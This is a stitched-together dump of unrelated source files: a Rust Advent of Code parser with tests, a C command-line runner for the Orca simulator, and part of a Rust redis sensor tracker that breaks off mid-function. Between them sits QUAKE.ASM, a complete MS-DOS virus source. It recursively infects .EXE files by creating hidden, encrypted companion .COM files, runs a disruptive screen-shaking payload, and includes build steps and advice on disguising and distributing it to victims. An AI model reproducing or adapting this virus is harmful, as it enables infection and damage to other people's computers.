/// Parses one moon per line from strings shaped like `<x=-1, y=0, z=2>`.
/// Surrounding whitespace is ignored and parsing stops at the first
/// blank line.
fn parse<S: AsRef<str>>(positions: S) -> Result<Vec<Moon>> {
    let mut moons = Vec::new();
    for raw_line in positions.as_ref().lines() {
        let line = raw_line.trim();
        if line.is_empty() {
            break;
        }
        // Strip the surrounding '<' and '>' and split the axes apart.
        let inner = &line[1..line.len() - 1];
        let axes: Vec<&str> = inner.split(',').map(|axis| axis.trim()).collect();
        // Each axis looks like "x=-1"; skip the two-character "x=" prefix.
        let x: CoordinateType = axes[0][2..].parse()?;
        let y: CoordinateType = axes[1][2..].parse()?;
        let z: CoordinateType = axes[2][2..].parse()?;
        moons.push(Moon::new(x, y, z));
    }
    Ok(moons)
}
#[cfg(test)]
mod tests {
    use super::*;

    // First sample system from AoC 2019 day 12: total energy 179 after
    // 10 steps, full repeat period 2772.
    #[test]
    fn test1() -> Result<()> {
        common_test(
            179,
            2772,
            10,
            r#"<x=-1, y=0, z=2>
        <x=2, y=-10, z=-7>
        <x=4, y=-8, z=8>
        <x=3, y=5, z=-1>"#,
        )
    }

    // Second sample system: much longer period (checks the LCM math).
    #[test]
    fn test2() -> Result<()> {
        common_test(
            1940,
            4_686_774_924,
            100,
            r#"<x=-8, y=-10, z=0>
        <x=5, y=5, z=10>
        <x=2, y=-7, z=3>
        <x=9, y=-8, z=-3>"#,
        )
    }

    // Checks both the full-turn period and the total energy after
    // `steps` ticks. The moons are re-parsed between the two checks so
    // each computation starts from the initial configuration.
    fn common_test(
        expected_total: usize,
        expected_period: usize,
        steps: usize,
        moons_str: &str,
    ) -> Result<()> {
        let mut moons = parse(moons_str)?;
        assert_eq!(expected_period, get_full_turn_period(&mut moons));
        moons = parse(moons_str)?;
        assert_eq!(expected_total, total_energy(steps, &mut moons));
        Ok(())
    }
}
| 23.58804 | 99 | 0.486901 | 3.328125 |
3fdd781f9e50b90b5ad1e5c8b4ac2e2d7bdb1c4c | 29,800 | asm | Assembly | MSDOS/Virus.MSDOS.Unknown.vclquake.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:13.000Z | 2022-03-16T09:11:05.000Z | MSDOS/Virus.MSDOS.Unknown.vclquake.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | null | null | null | MSDOS/Virus.MSDOS.Unknown.vclquake.asm | fengjixuchui/Family | 2abe167082817d70ff2fd6567104ce4bcf0fe304 | [
"MIT"
] | 3 | 2021-05-15T15:57:15.000Z | 2022-01-08T20:51:04.000Z | ; -----------------------------------------------------------------------------
; QUAKE.ASM
; Created with Nowhere Man's Virus Creation Laboratory v1.00
;
; Heavily modified VCL and Original Code by the best Bleeding Edge virus
; writer: Night Breeze. See you all in fuckin' HELL!
;
; This is a "spawning" virus and, technically, a trojan horse. First time it
; is run, it will do the earthquake thing - but only after infecting another
; file first! When the infected file is executed (in it's directory) then it
; will infect another file and run the app. Then, when all files on that drive
; are infected, it will again do the earthquake thing!
;
; Build instructions:
;
; Assemble QUAKE.ASM to QUAKE.COM
; d:\tasm\tasm /mx /m2 /q /t quake
; link quake;
; exe2bin quake.exe quake.com
;
; Run QUAKE.COM and file the infected file...<g>
; Find file
; ATTRIB *.COM -r -h
;
; Get a copy of that file as it is encrypted...
; COPY filename.COM \mydir\TEMP.COM
;
; Compile QINJECT.PAS
;
; Cat the two files:
; COPY /b TEMP.COM+QINJECT.EXE QUAKE.EXE (i know, overwrites)
;
; Now, QINJECT actually as the same strings (most) as QUAKE.COM, so if the
; user types or debugs the program, will see the strings. The REAL virus
; is hidden, and encrypted, at the start of QUAKE.EXE (it's really a com file).
;
; NOTE: The flag SHOW_FLAG is used to allow an intial infection, then to all
; the victim to see an apparently good program - although he is getting
; fucked :)
;
;
; If all that was too hard... just distribute the enclosed EARTH.EXE program:)
;
; -----------------------------------------------------------------------------
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
start label near
; -----------------------------------------------------------------------------
main proc near
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
inc Show_Flag ; Inc infect count
mov si, offset spawn_name ; Save a copy of the
mov di, offset save_name ; file to "spawn"
cld
mov cx, 14 ; It's allways 14 bytes
rep movsb
call search_files ; Find and infect a file
mov al,byte ptr [set_carry] ; AX holds ALL INFECTED value
cmp al, 0 ; Have we infected all files?
jz Effect ; If so, then do it!
cmp Show_Flag,3 ; Should we show display?
jl Effect
jmp short end00
Effect:
call EarthQuake ; Let's do it!
jmp short Finito ; And don't run app!
end00:
mov ah,04Ah ; DOS resize memory function
mov bx,(finish - start) / 16 + 0272h ; BX holds # of para.
int 021h
mov sp,(finish - start) + 01100h ; Change top of stack
mov si,offset save_name ; SI points to true filename
int 02Eh ; DOS execution back-door
Finito:
mov ah,04Ch ; DOS terminate function
int 021h
main endp
; -----------------------------------------------------------------------------
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
mov dx,offset root ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
; -----------------------------------------------------------------------------
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
mov dx,offset all_files ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
mov dx,offset up_dir ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
mov dx,offset exe_mask ; DX points to "*.EXE"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
exe_mask db "*.EXE",0 ; Mask for all .EXE files
traverse endp
; -----------------------------------------------------------------------------
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx, 00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
; -----------------------------------------------------------------------------
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop: lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end:
mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc infection_done ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx, 00100011b ; CX holds file attributes
int 021h
xchg bx,ax ; BX holds file handle
call encrypt_code ; Write an encrypted copy
mov ah,03Eh ; DOS close file function
int 021h
infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed
ret ; Return to caller
; -----------------------------------------------------------------------------
spawn_name db 0, 12 dup (?),13 ; Name for next spawn
save_name db 0, 12 dup (?),13 ; Name for current spawn
show_flag db 0 ; When 0 & 1 then show display
set_carry db ? ; Set-carry-on-exit flag
infect_file endp
; =============================================================================
EarthQuake proc near
call InitCrt ; Initialize the vars
call DrawFrame ; Draw a frame in middle of screen
mov cx, 2 ; Make some noise
call Siren
mov si, OFFSET Warning ; Put Msg 1
mov dx,0718h ; Move to Row 8, column 20
call WriteStr
mov cx, 1
call Siren
mov si, OFFSET ToHills ; Put Msg 2
mov dx,0A16h ; Move to Row 10, column 18
call WriteStr
mov cx, 2 ; More noise
call Siren
call Shake ; Shake the screen - it's a quake!
call DrawFrame ; Draw a frame in middle of screen
mov si, OFFSET MadeIt ; Put Made It Msg
mov dx,081Fh
call WriteStr
cmp Show_Flag, 3
jl EarthDone
mov si, OFFSET BurmaShave ; Put Logo
mov dx,0C36h
call WriteStr
EarthDone:
ret
EarthQuake endp
Warning db '* * * Earthquake Warning! * * *', 0
ToHills db 'Head for the hills! Take cover!!!', 0
MadeIt db 'Whew! We Made It!', 0
BurmaShave db '-=[VCL/BEv]=-', 0
Table struc ; Structure of the Shaker Table
Iters db 0 ; Number of interations (quakes)
Cols db 0 ; Scroll number of columns
Pause dw 0 ; And then wait this much time
Table ends
QuakeTable Table < 3, 1, 500>
Table < 4, 2, 250>
Table < 5, 3, 175>
Table < 6, 4, 100>
Table <10, 5, 30>
Table <20, 5, 10>
Table <10, 5, 30>
Table < 5, 4, 100>
Table < 4, 3, 175>
Table < 3, 2, 250>
Table < 2, 1, 500>
Table < 0, 0, 0> ; End of data
; -----------------------------------------------------------------------------
Shake proc near
mov si, OFFSET QuakeTable ; Get pointer to table
xor cx,cx
ShakeNext:
mov cl, [si].Iters
jcxz ShakeDone
ShakeInner:
push cx ; Save for later
push si ; ditto
xor ax,ax ; duh...
mov al, [si].Cols ; Number of columns to scroll
push ax ; Get Ready
call ScrollRight ; Go...Scroll Screen to right
pop si ; Restore it
cmp [si].Cols, 3 ; Check if we are scrolling more than 3
jle ShakeCont1 ; If less or equal then skip vert scroll
mov ah, 6 ; Scroll up 1 line
call Scroll ; Do it.
ShakeCont1:
mov cx, [si].Pause ; delay period
call Delay ; Wait around a bit
push si ; And save our table index for l8r
xor ax,ax ; duh...
mov al, [si].Cols ; Number of columns to scroll
push ax ; Get Ready...Set...
call ScrollLeft ; Go! ... Scroll screen left
pop si ; And restore our table index
cmp [si].Cols, 3 ; Check if we are scrolling more than 3
jle ShakeCont2 ; If less or equal then skip vert scroll
mov ah, 7 ; Scroll up 1 line
call Scroll ; Do it.
ShakeCont2:
mov cx, [si].Pause ; pause again
call Delay ; Do it.
pop cx ; Get back our iteration counter
Loop ShakeInner ; Keep going
add si, 4 ; Move to next table element
jmp short ShakeNext ; Keep on doing it...
ShakeDone:
ret
Shake endp
; -----------------------------------------------------------------------------
; in: cx = number of times to do the siren
Siren proc near
KeepGoing:
push cx ; Save the count
mov ax, 880 ; Freq
mov bx, 500 ; Duration = 1/2 second
push ax ; Put Freq on stack
push bx ; Put Duration on stack
call Beep ; Make a noise
mov ax, 660 ; Freq
mov bx, 500 ; Duration = 1/5 second
push ax ; Put Freq on stack
push bx ; Put Duration on stack
call Beep ; Make more noise
pop cx ; Restore the count
loop KeepGoing ; So we can keep going
ret
Siren endp
; -----------------------------------------------------------------------------
; ds:si points to the null terminated string to print
; dx has row/col - dh=row
WriteStr proc near
mov bh,0 ; We'll be working on page 0
WriteMore:
mov al,[si] ; get the next character to print
cmp al, 0 ; done yet?
jz WriteDone ; Yep, so quit
inc si ; si++
mov ah,2 ; locate cursor at dx
int 10h ; do it
push cx ; save it for later
mov cx,1 ; count of characters to write!
mov ah,10 ; subfunction 10
int 10h ; call bios to do our dirty work
pop cx ; get it back
inc dx ; move to next cursor position
jmp short WriteMore ; keep going for cx
WriteDone:
ret
WriteStr endp
; -----------------------------------------------------------------------------
DrawFrame proc near
push bp ; Work around a stoopid bug in PC/XTs
mov ax, 0600h ; Draw and clear the outer frame
push ax ; Save for later
mov cx, 050Ah ; Upper screen coords: CH = ROW
mov dx, 0D46h ; Lower bounds, DH = ROW
mov bh, 70h ; Color is White Background, Black fore
int 10h ; Do It.
pop ax ; Draw and clear the inner frame
mov cx, 060Ch ; Upper screen coords: CH = ROW
mov dx, 0C44h ; Lower bounds, DH = ROW
mov bh, 0Eh ; Color is Black Background, Yellow fore
int 10h ; Do It Again
pop bp ; End of stoopid fix
ret
DrawFrame endp
; =============================================================================
ScrollRight proc near
push bp
mov bp, sp
mov ax, [bp+4] ; calc ColsToMove <- LEN shl 1
shl ax, 1 ; multiply by 2
mov ColsToMove, ax ; And save it
mov bx, NumCols ; calc WordsToScroll <- NumCols - LEN
sub bx, ax ; adjust for scroll difference
inc bx ; BX = WordsToScroll
mov ax, VidSegment ; Put ES = Video Segment
mov es, ax
xor ax, ax ; Start on row 0 aka 1
sr_NextRow:
push ax ; Save for later
mul LineWidth ; AX now has ROW * LineWidth
push ax ; Save start of row offset for printing
add ax, LineWidth ; AX points to last byte of the row
sub ax, ColsToMove ; This moves back 1 LEN of ch/attr pairs
mov di, ax ; save in DEST
sub ax, ColsToMove ; AX now moves back another LEN pairs
mov si, ax ; save in SOURCE
mov cx, bx ; BX = Words to Scroll
push ds ; Stash this
push es ; Make DS = ES
pop ds ; Like this
std ; Set SI and DI to decrement
rep movsw
pop ds ; Get the DS back
pop di ; Grab the Source Offset we saved above
mov cx, [bp+4] ; Prepare to print LEN blanks
call PrintBlank
pop ax ; Saved row
inc ax ; Move to next row
cmp ax, 25 ; Done with all rows?
jne sr_NextRow ; No? Then do next row!
mov sp, bp
pop bp
ret 2
ScrollRight endp
; -----------------------------------------------------------------------------
ScrollLeft proc near
push bp
mov bp, sp
mov ax, [bp+4] ; calc ColsToMove := Len Shl 1
shl ax, 1
mov ColsToMove, ax
mov bx, NumCols ; calc WordsToScroll := pred(NumCols) shl 1
mov ax, VidSegment ; Make ES point to the video segment
mov es, ax
mov es, ax
xor ax, ax ; Start on row 0 aka 1
sl_NextRow:
push ax ; Save Row for later
mul LineWidth ; calc AX := Row * LineWidth
push ax ; Save Start of Line
mov di, ax ; This is where it's going
add ax, ColsToMove ; calc AX := AX + ColsToMove
mov si, ax ; This will be our source
push ds ; Stash for later ...
push es ; Make DS = ES = Video Segment
pop ds
mov cx, bx ; BX = Words To Scroll
cld ; Set SI and DI to decrement
rep movsw
pop ds ; Get our DS back...
pop di ; Grab the Source Offset we saved
add di, LineWidth
sub di, colsToMove
mov cx, [bp+4] ; Prepare to print some blanks
call PrintBlank ; Do It
pop ax ; Get back out row value
inc ax ; And move to next row
cmp ax, 25 ; first check if we are done
jne sl_NextRow ; If now, then do next row
mov sp, bp
pop bp
ret 2
ScrollLeft endp
; -----------------------------------------------------------------------------
; In AH = 6 scroll up
; = 7 scroll down
Scroll proc near
mov al, 1 ; We will always scroll 1 line
xor cx, cx ; Set Top Row/Col to (0,0)
mov dx, 184Fh ; Set Bottom Row/Col to (24,79)
mov bh, 07h ; Use a normal blank
push bp ; Work around a lame bug on PC/XTs
int 10h ; Do Bios...Oh Do Me Now
pop bp ; And continue fixing that st00pid bug
ret ; I really feel sill doc'g this routine...
Scroll endp
; -----------------------------------------------------------------------------
PrintBlank proc near
; In ES - Video Segment
; DI - Offset to print blank at
; CX - Number of blanks to print
cld ; store forward (increment DI)
mov al,' ' ; We want to print a blank
PrintAgain:
stosb ; put in one blank char
inc di ; skip video attribute
loop short PrintAgain
ret
PrintBlank endp
; -----------------------------------------------------------------------------
; All the routines dealing with Sound and Delays - especially the delay
; calibration routine were mostly stolen from Kim Kokkonen's code in earlier
; version of Turbo Professional. KK is the owner of Turbo Power - a damn good
; set of programming tools - plug plug!
; Beep(Hz, MS:Word); assembler;
Beep proc near
push bp
mov bp, sp
mov bx, [bp+6] ; hertz
mov AX,34DDH
mov DX,0012H
cmp DX,BX
jnc beepStop
div BX
mov BX,AX ; Lots of port tweaking... Isn't
in AL,61H ; this shit fun???
test AL,3
jnz @99
or AL,3
out 61H,AL
mov AL,0B6H
out 43H,AL
@99:
mov AL,BL ; I know I never get bored.!!
out 42H,AL
mov AL,BH
out 42H,AL
BeepStop:
mov CX, [bp+4] ; push ms delay time
call Delay ; and wait...
IN AL, 61h ; Now turn off the speaker
AND AL, 0FCh
out 061h, AL
mov sp, bp
pop bp
ret 4
Beep endp
; -----------------------------------------------------------------------------
; In: cx = delay in ms
Delay proc near
delay1: ; What's to say... a tight loop
call delayOneMS ; counting milliseconds
loop short delay1
ret
Delay endp
; =============================================================================
DelayOneMS proc near
push cx ; Save CX
mov cx, OneMS ; Loop count into CX
DelayOne1:
loop delayOne1 ; Wait one millisecond
pop cx ; Restore CX
ret
DelayOneMs endp
; -----------------------------------------------------------------------------
Calibrate_Delay proc near
mov ax,40h
mov es,ax
mov di,6Ch ; ES:DI is the low word of BIOS timer count
mov OneMS, 55 ; Initial value for One MS's time
xor dx,dx ; DX = 0
mov ax,es:[di] ; AX = low word of timer
CalKeepOn:
cmp ax,es:[di] ; Keep looking at low word of timer
je CalKeepOn ; until its value changes...
mov ax,es:[di] ; ...then save it
CalDoMore:
call DelayOneMs ; Delay for a count of OneMS (55)
inc dx ; Increment loop counter
cmp ax,es:[di] ; Keep looping until the low word...
je CalDoMore ; ...of the timer count changes again
mov OneMS, dx ; DX has new OneMS }
ret
Calibrate_Delay endp
; -----------------------------------------------------------------------------
InitCrt proc near
mov ah,15 ; Get Video Mode
int 10h
cmp al, 7 ; Check if this is monochrome
je DoneInit
add VidSegment, 800h
DoneInit:
mov byte ptr NumCols, ah ; Set the number of Character Cols
shl ah, 1 ; Mult by two for number of vid bytes
mov byte ptr LineWidth, ah ; And stash it...
ToneInit:
call Calibrate_Delay
ret
InitCrt endp
; =============================================================================
VidSegment dw 0B000h ; Base Video Segment
NumCols dw ? ; Columns on Screen
LineWidth dw ? ; NumCols * 2
ColsToMove dw ? ; Number of video bytes to move each time
OneMS dw ? ; Calibration value for 1 ms of time
; =============================================================================
encrypt_code proc near
mov si,offset encrypt_decrypt; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si],1 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
mov di,offset finish ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
mov si,offset write_stuff ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
mov dx,offset start ; DX points to virus
call finish ; Encrypt/write/decrypt
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
; -----------------------------------------------------------------------------
encrypt_decrypt proc near
mov si,offset start_of_code ; SI points to code to decrypt
nop ; Defeat SCAN 95B
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
| 41.678322 | 81 | 0.429228 | 3.046875 |
b1b339ac49e786ddbd73ce87153a846968bed309 | 2,925 | c | C | cli_main.c | DoubleDensity/Orca-c | 86dd6be4f4edc4fadf253eba3a7baded145cdef5 | [
"MIT"
] | null | null | null | cli_main.c | DoubleDensity/Orca-c | 86dd6be4f4edc4fadf253eba3a7baded145cdef5 | [
"MIT"
] | null | null | null | cli_main.c | DoubleDensity/Orca-c | 86dd6be4f4edc4fadf253eba3a7baded145cdef5 | [
"MIT"
] | null | null | null | #include "bank.h"
#include "base.h"
#include "field.h"
#include "mark.h"
#include "sim.h"
#include <getopt.h>
// Writes the command-line help text to stderr.
static void usage(void) {
  // clang-format off
  fputs(
      "Usage: cli [options] infile\n\n"
      "Options:\n"
      "    -t <number>   Number of timesteps to simulate.\n"
      "                  Must be 0 or a positive integer.\n"
      "                  Default: 1\n"
      "    -h or --help  Print this message and exit.\n",
      stderr);
  // clang-format on
}
// Entry point: parses options, loads the grid file, runs the requested
// number of simulation timesteps, and prints the final grid to stdout.
int main(int argc, char** argv) {
  // Long-option table; only --help is defined. The short options come
  // from the "t:h" optstring passed to getopt_long below.
  static struct option cli_options[] = {{"help", no_argument, 0, 'h'},
                                        {NULL, 0, NULL, 0}};

  char* input_file = NULL;
  int ticks = 1;  // default number of timesteps

  for (;;) {
    int c = getopt_long(argc, argv, "t:h", cli_options, NULL);
    if (c == -1)
      break;
    switch (c) {
    case 't':
      ticks = atoi(optarg);
      // atoi returns 0 both for "0" and for unparseable input, so a
      // literal "0" is distinguished from garbage with strcmp.
      if (ticks == 0 && strcmp(optarg, "0")) {
        fprintf(stderr,
                "Bad timestep argument %s.\n"
                "Must be 0 or a positive integer.\n",
                optarg);
        return 1;
      }
      break;
    case 'h':
      usage();
      return 0;
    case '?':
      // getopt_long already printed a diagnostic for the bad option.
      usage();
      return 1;
    }
  }

  // Exactly one positional argument (the input file) is accepted.
  if (optind == argc - 1) {
    input_file = argv[optind];
  } else if (optind < argc - 1) {
    fprintf(stderr, "Expected only 1 file argument.\n");
    usage();
    return 1;
  }

  if (input_file == NULL) {
    fprintf(stderr, "No input file.\n");
    usage();
    return 1;
  }
  if (ticks < 0) {
    fprintf(stderr, "Time must be >= 0.\n");
    usage();
    return 1;
  }

  Field field;
  field_init(&field);
  // Map the load-error enum to a human-readable message on failure.
  Field_load_error fle = field_load_file(input_file, &field);
  if (fle != Field_load_error_ok) {
    field_deinit(&field);
    char const* errstr = "Unknown";
    switch (fle) {
    case Field_load_error_ok:
      break;
    case Field_load_error_cant_open_file:
      errstr = "Unable to open file";
      break;
    case Field_load_error_too_many_columns:
      errstr = "Grid file has too many columns";
      break;
    case Field_load_error_too_many_rows:
      errstr = "Grid file has too many rows";
      break;
    case Field_load_error_no_rows_read:
      errstr = "Grid file has no rows";
      break;
    case Field_load_error_not_a_rectangle:
      errstr = "Grid file is not a rectangle";
      break;
    }
    fprintf(stderr, "File load error: %s.\n", errstr);
    return 1;
  }

  // Scratch marker buffer sized to the grid, reused across timesteps.
  Mbuf_reusable mbuf_r;
  mbuf_reusable_init(&mbuf_r);
  mbuf_reusable_ensure_size(&mbuf_r, field.height, field.width);
  Oevent_list oevent_list;
  oevent_list_init(&oevent_list);
  // Run the simulation for the requested number of ticks; the tick
  // index `i` is passed through to orca_run.
  Usz max_ticks = (Usz)ticks;
  for (Usz i = 0; i < max_ticks; ++i) {
    orca_run(field.buffer, mbuf_r.buffer, field.height, field.width, i,
             &oevent_list, ORCA_PIANO_BITS_NONE);
  }
  mbuf_reusable_deinit(&mbuf_r);
  oevent_list_deinit(&oevent_list);
  // Print the final grid state and release it.
  field_fput(&field, stdout);
  field_deinit(&field);
  return 0;
}
| 25.434783 | 71 | 0.579487 | 3.1875 |
3d60ad7843a4d9704383b7fa3a512ba724484fbd | 8,189 | rs | Rust | services/sensor_tracker/src/predis.rs | Terkwood/prawnalith | fda255912eee8f7caff185b3507bdf052c9420d8 | [
"Apache-2.0",
"MIT"
] | 16 | 2018-11-06T09:31:55.000Z | 2021-07-01T15:14:41.000Z | services/sensor_tracker/src/predis.rs | Terkwood/prawnalith | fda255912eee8f7caff185b3507bdf052c9420d8 | [
"Apache-2.0",
"MIT"
] | 50 | 2018-10-05T12:55:50.000Z | 2020-05-23T15:15:37.000Z | services/sensor_tracker/src/predis.rs | Terkwood/prawnalith | fda255912eee8f7caff185b3507bdf052c9420d8 | [
"Apache-2.0",
"MIT"
] | null | null | null | use redis::Commands;
use super::model;
use redis_context::RedisContext;
use redis_delta::REvent;
use serde_json;
use std::time::SystemTime;
use uuid::Uuid;
/// Updates redis so that the individual measurement is applied to the correct tank.
/// Also records the measurement to a record associated with the sensor itself.
/// Keeps track of how many updates have been applied to each tank and sensor record.
/// Will create a new sensor record for this device if one does not already exist.
///
/// Returns the list of `REvent` deltas describing every redis key that
/// was actually changed by this call.
pub fn update<'a, 'b>(
    redis_ctx: &RedisContext,
    measure: &model::Measurement,
    ext_device_id: &str,
) -> Result<Vec<REvent>, redis::RedisError> {
    // Each redis mutation below is mirrored as an REvent so callers can
    // see exactly which keys changed.
    let mut delta_events: Vec<REvent> = vec![];
    println!("Received redis {} update: {:?}", measure.name(), measure);
    // Map the device's external id into the internal UUID namespace for
    // this measurement type.
    // NOTE(review): the unwrap assumes this mapping cannot fail --
    // confirm internal_device_id's failure modes before relying on it.
    let ext_device_namespace = &redis_ctx.get_external_device_namespace(measure.name())?;
    let device_id = internal_device_id(ext_device_id, ext_device_namespace).unwrap();
    println!("\tDevice ID (internal): {}", device_id);
    let rn = &redis_ctx.namespace;

    // Register the sensor in the per-type member set (None if it was
    // already present).
    let sensor_set_event = update_sensor_set(redis_ctx, rn, measure, device_id);
    if let Some(e) = sensor_set_event {
        delta_events.push(e)
    }

    // lookup associated tank
    let sensor_hash_key = &format!("{}/sensors/{}/{}", rn, measure.name(), device_id).to_string();

    // One round trip fetches the tank id, the area id, and this
    // measurement type's update counter from the sensor hash.
    let tank_and_area_and_update_count: Result<Vec<Option<u64>>, _> = redis_ctx.conn.hget(
        sensor_hash_key,
        vec!["tank", "area", &format!("{}_update_count", measure.name())],
    );

    if let Ok(v) = tank_and_area_and_update_count {
        // Tank associated with this sensor?
        // A tank association wins over an area association; with
        // neither, just make sure the sensor hash itself exists.
        let revent = match (v.get(0).unwrap_or(&None), v.get(1).unwrap_or(&None)) {
            (Some(tank_num), _) => {
                update_container_hash(redis_ctx, Container::Tanks, tank_num, &measure)
            }
            (_, Some(area_num)) => {
                update_container_hash(redis_ctx, Container::Areas, area_num, &measure)
            }
            (None, None) => ensure_sensor_hash_exists(redis_ctx, sensor_hash_key, ext_device_id),
        };

        if let Some(ev) = revent {
            delta_events.push(ev)
        }

        // record a hit on the updates that the sensor has seen
        // and also record the most recent measurement on the record
        // for this individual sensor
        let sensor_updated = update_sensor_hash(
            redis_ctx,
            sensor_hash_key,
            measure,
            v.get(2).unwrap_or(&None),
        );
        if let Some(ev) = sensor_updated {
            delta_events.push(ev)
        }
    };

    Ok(delta_events)
}
fn update_sensor_set(
redis_ctx: &RedisContext,
rn: &str,
measure: &model::Measurement,
device_id: Uuid,
) -> Option<REvent> {
let set_sensor_type_key = format!("{}/sensors/{}", rn, measure.name());
// add to the member set if it doesn't already exist
let sensors_added: Result<u64, _> = redis_ctx
.conn
.sadd(&set_sensor_type_key, &format!("{}", device_id));
match sensors_added {
Ok(n) if n > 0 => Some(REvent::SetUpdated {
key: set_sensor_type_key,
}),
_ => None,
}
}
enum Container {
Tanks,
Areas,
}
impl Container {
pub fn to_string(self) -> String {
match self {
Container::Tanks => "tanks".to_string(),
Container::Areas => "areas".to_string(),
}
}
}
fn update_container_hash(
redis_ctx: &RedisContext,
container: Container,
container_num: &u64,
measure: &model::Measurement,
) -> Option<REvent> {
// We found the area associated with this
// sensor ID, so we should update that area's
// current reading.
let container_key = format!(
"{}/{}/{}",
redis_ctx.namespace,
container.to_string(),
container_num
);
let container_measure_count: Result<Option<u32>, _> = redis_ctx
.conn
.hget(&container_key, &format!("{}_update_count", measure.name()));
let uc_name = format!("{}_update_count", measure.name());
let ut_name = format!("{}_update_time", measure.name());
let update: (Result<String, _>, Vec<&str>) = {
let mut data: Vec<(&str, String)> = measure.to_redis();
data.push((
&uc_name,
container_measure_count
.unwrap_or(None)
.map(|u| u + 1)
.unwrap_or(1)
.to_string(),
));
data.push((&ut_name, epoch_secs().to_string()));
(
redis_ctx.conn.hset_multiple(&container_key, &data[..]),
data.iter().map(|(a, _)| *a).collect(),
)
};
match update {
(Err(e), _) => {
println!("update fails for {}: {:?}", container_key, e);
None
}
(Ok(_), fields) if fields.len() > 0 => {
let fs = fields.iter().map(|s| s.to_string()).collect();
Some(REvent::HashUpdated {
key: container_key.to_string(),
fields: fs,
})
}
_ => None,
}
}
fn ensure_sensor_hash_exists(
redis_ctx: &RedisContext,
sensor_hash_key: &str,
ext_device_id_str: &str,
) -> Option<REvent> {
// We know that there's no associated "tank"
// field for this key. Let's make sure the record
// for this sensor exists -- we'll need a human
// to come in and link this device to a specific tank
// using redis-cli!
let mut result: Option<REvent> = None;
redis_ctx
.conn
